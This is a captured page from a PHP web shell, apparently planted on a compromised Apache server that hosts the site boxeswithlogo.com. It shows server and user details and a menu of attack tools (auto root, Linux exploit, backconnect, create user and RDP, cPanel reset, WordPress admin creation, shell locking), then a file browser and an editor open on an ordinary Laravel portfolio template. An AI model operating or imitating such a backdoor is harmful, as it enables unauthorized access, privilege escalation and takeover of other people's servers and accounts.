Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.119
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
boxeswithlogo.com /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
1.51
KB
-rw-r--r--
beat_my_quote.blade.php
11.62
KB
-rw-r--r--
blogs.blade.php
5.81
KB
-rw-r--r--
category_products.blade.php
31.47
KB
-rw-r--r--
contact_us.blade.php
14.65
KB
-rw-r--r--
dashboard.blade.php
4.07
KB
-rw-r--r--
faqs.blade.php
3.86
KB
-rw-r--r--
index.blade.php
49.56
KB
-rw-r--r--
personalized_packaging_boxes.b...
6.48
KB
-rw-r--r--
portfolio.blade.php
3.11
KB
-rw-r--r--
post.blade.php
1.65
KB
-rw-r--r--
privacy_security.blade.php
1.33
KB
-rw-r--r--
product_detail.blade.php
67.36
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
3.95
KB
-rw-r--r--
sitemap.blade.php
6.82
KB
-rw-r--r--
sitemapxml.blade.php
2.32
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
1.39
KB
-rw-r--r--
test.blade.php
2.38
KB
-rw-r--r--
thank_you.blade.php
2.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : portfolio.blade.php
@extends('layouts.app') @push('styles') <link rel="stylesheet" href="{{ asset('assets/css/static_pages.css') }}"> @endpush <?php $files = \Illuminate\Support\Facades\File::files(public_path('assets/Portfolio/')); $images = []; foreach ($files as $file) { $images[] = $file->getRelativePathname(); } ?> <style> span.res-search { float: right; display: block; line-height: 75px; margin-top: 26px; } @media (max-width: 1024px) { .navbar .megamenu { left: 66px !important; right: 0; width: 76% !important; top: 103% !important; } .contact-row { margin-left: 120px !important; } span.res-search { float: right; display: block; line-height: 75px; margin-top: 26px; } } </style> @section('contents') <section class="breadscrumb-section pt-0"> <div class="container-fluid-lg"> <div class="row"> <div class="col-12"> <div class="breadscrumb-contain"> <nav style="margin: 0;"> <ol class="breadcrumb mb-0"> <li class="breadcrumb-item"> <a href="{{url('/')}}"> <i class="fa-solid fa-house"></i> </a> </li> <li class="breadcrumb-item ">{{'Portfolio'}}</li> </ol> </nav> </div> </div> </div> </div> </section> <div class="portfolio"> <div class="container"> <div class="row"> <div class="col-12 py-5"> <h1>The House of Best Custom Printing & Proficient Packaging Solutions</h1> <p> BOXESWithLogo proudly owns the best experts of printing and packaging industry. Here is the collection of some of the boxes crafted right according to our valued customers’ requirements. Having an ability to customize packaging boxes in different sizes, shapes and styles, BOXESWithLogo fulfills the requirement of customers in lowest rate with flawless printed results. Not only we accept short and long run orders, we use 100% recyclable Cardboard, Kraft and Corrugated materials to give you unrivaled printing and packaging solutions. </p> </div> </div> <div class="card-columns"> <div class="row"> @foreach($images as $path) <div class="col-3 my-2"> <div class="card"> <img class="card-img-bottom" src="{{ asset('assets/Portfolio/'.$path) }}" alt="Card image cap" width="304px" height="304px"> </div> </div> @endforeach </div> </div> </div> </div> @endsection
Close